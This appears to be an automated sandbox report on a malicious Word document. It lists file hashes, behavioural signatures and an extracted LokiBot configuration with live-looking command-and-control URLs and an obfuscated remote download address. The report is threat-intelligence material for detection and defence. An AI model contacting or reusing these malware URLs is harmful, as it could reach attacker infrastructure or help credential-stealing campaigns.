General
-
Target
Scan_Copy264293.docx.doc
-
Size
10KB
-
Sample
230217-aqp1nscd6w
-
MD5
d7976a1b0ba9ef31b265e27f03cfc3b8
-
SHA1
1d0671fd17080358afc60b501d0d13b222628ac7
-
SHA256
39999753f89f21851b943b83359b3738e180129a239cc4e424ebb077ec738d2f
-
SHA512
1b6dd881fa1b0e68ff1715636182e9db0cb1a827dd8ca7cc029c863485c23d72938d838f67334dd8b3445f919371ed91b9b888e5702136087aa48c1188acb5c9
-
SSDEEP
192:ScIMmtP5hG/b7XN+eOneQjO+5+5F7Jar/YEChI3Lt:SPXRE7XtOP7wtar/YECO5
Static task
static1
Behavioral task
behavioral1
Sample
Scan_Copy264293.docx
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
Scan_Copy264293.docx
Resource
win10v2004-20221111-en
Malware Config
Extracted
http:/QQQQWWWWQWWWWQWWQWQWQWQQWQWQQWQWQWQWQWQWQWQQQQQQQQOQQQQQOOOOOOOOQOQQQQOQOQOQOQOQOQQWWWWQWQWQWQWQWQWQWQWQQWQ@1332625038/O.DOC
Extracted
lokibot
http://171.22.30.164/yan/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Targets
-
-
Target
Scan_Copy264293.docx.doc
-
Size
10KB
-
MD5
d7976a1b0ba9ef31b265e27f03cfc3b8
-
SHA1
1d0671fd17080358afc60b501d0d13b222628ac7
-
SHA256
39999753f89f21851b943b83359b3738e180129a239cc4e424ebb077ec738d2f
-
SHA512
1b6dd881fa1b0e68ff1715636182e9db0cb1a827dd8ca7cc029c863485c23d72938d838f67334dd8b3445f919371ed91b9b888e5702136087aa48c1188acb5c9
-
SSDEEP
192:ScIMmtP5hG/b7XN+eOneQjO+5+5F7Jar/YEChI3Lt:SPXRE7XtOP7wtar/YECO5
Score10/10-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Accesses Microsoft Outlook profiles
-
Suspicious use of SetThreadContext
-